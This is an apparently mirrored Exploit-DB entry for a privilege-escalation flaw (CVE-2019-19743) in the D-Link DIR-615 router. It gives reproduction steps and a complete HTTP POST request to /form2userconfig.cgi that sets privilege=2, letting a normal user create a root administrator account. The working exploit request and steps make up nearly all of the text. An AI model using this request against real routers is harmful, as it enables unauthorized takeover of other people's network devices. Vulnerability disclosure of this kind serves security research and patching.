D-Link DIR-615 – Privilege Escalation

  • 作者: Sanyam Chawla
    日期: 2019-12-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47778/
  • # Exploit Title: D-Link DIR-615 - Privilege Escalation
    # Date: 2019-12-10
    # Exploit Author: Sanyam Chawla
    # Vendor Homepage: http://www.dlink.co.in
    # Category: Hardware (Wi-fi Router)
    # Hardware Link: http://www.dlink.co.in/products/?pid=678
    # Hardware Version: T1
    # Firmware Version: 20.07
    # Tested on: Windows 10 and Kali linux
    # CVE: CVE-2019-19743
    
    # Reproduction Steps:
    # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
    # Go to the Maintenance page and click on Admin on the left panel.
    # There is an option to create a user and by default, it shows only user accounts.
    # Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) 
    # by changing privileges id (1 to 2) with burp suite.
    
    # Privilege Escalation Post Request 
    
    POST /form2userconfig.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 122
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/userconfig.htm
    Cookie: SessionID=
    Upgrade-Insecure-Requests: 1
    
    username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
    
    # Now log in with newly created root (ptguy) user. You have all administrator rights.